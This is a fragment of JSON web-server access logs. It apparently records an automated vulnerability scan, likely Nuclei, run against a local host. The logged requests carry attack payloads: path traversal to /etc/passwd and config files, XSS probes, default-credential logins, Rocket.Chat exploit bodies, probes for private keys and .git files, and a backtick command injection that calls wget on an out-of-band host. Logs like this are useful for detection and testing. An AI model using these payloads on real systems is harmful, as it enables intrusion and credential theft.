+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel-filemanager/download?working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type=&file=passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.202","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /setup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /messages HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /297MTtPNoYtACuyLNgOlO454SXG HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application/logs/access.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.193","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"j_username=admin&j_password=admin&from=%2F&Submit=Sign+in","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22root\x22,\x22password\x22:\x225iveL!fe\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.195","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"user=admin&passwd=admin&challengePwd=&ok=Login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /php/login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.207","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"username=root&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/luci/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?return_url=javascript:alert(document.domain) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.198","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /run.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"username=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /timesheet/login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin\x22,\x22password\x22:\x225iveL!fe\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /private-key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webconsole/webpages/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.187","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apis/apps/v1/namespaces/default/deployments HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"{\x22message\x22:\x22{\x5C\x22msg\x5C\x22:\x5C\x22method\x5C\x22,\x5C\x22method\x5C\x22:\x5C\x22livechat:registerGuest\x5C\x22,\x5C\x22params\x5C\x22:[{\x5C\x22token\x5C\x22:\x5C\x22cvenucleirocketchat\x5C\x22,\x5C\x22name\x5C\x22:\x5C\x22cve-2020-nuclei\x5C\x22,\x5C\x22email\x5C\x22:\x5C\x22cve@nuclei.local\x5C\x22}],\x5C\x22id\x5C\x22:\x5C\x22123\x5C\x22}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v1/method.callAnon/cve_exploit HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /privatekey.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /userportal/webpages/myaccount/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /compile.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2Fc9v8h88smpv8c1ig07h0qpbf94boso49h.oast.fun%60 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.183","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /weblogin.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"1.185","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"{\x22message\x22:\x22{\x5C\x22msg\x5C\x22:\x5C\x22method\x5C\x22,\x5C\x22method\x5C\x22:\x5C\x22livechat:loadHistory\x5C\x22,\x5C\x22params\x5C\x22:[{\x5C\x22token\x5C\x22:\x5C\x22cvenucleirocketchat\x5C\x22,\x5C\x22rid\x5C\x22:\x5C\x22GENERAL\x5C\x22}],\x5C\x22msg\x5C\x22:\x5C\x22123\x5C\x22}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v1/method.callAnon/cve_exploit HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sql.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.182","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.187","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"more=0&host=0&username=admin&password=admin&db=&lang=en_us&expire=3","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?action=login.index HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"127.0.0.1/index.php?action=login.index", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /account/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=Admin-Data-down&id=../../Conf/config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /content../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /init.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apiclient/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.201","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authenticationserverservlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) 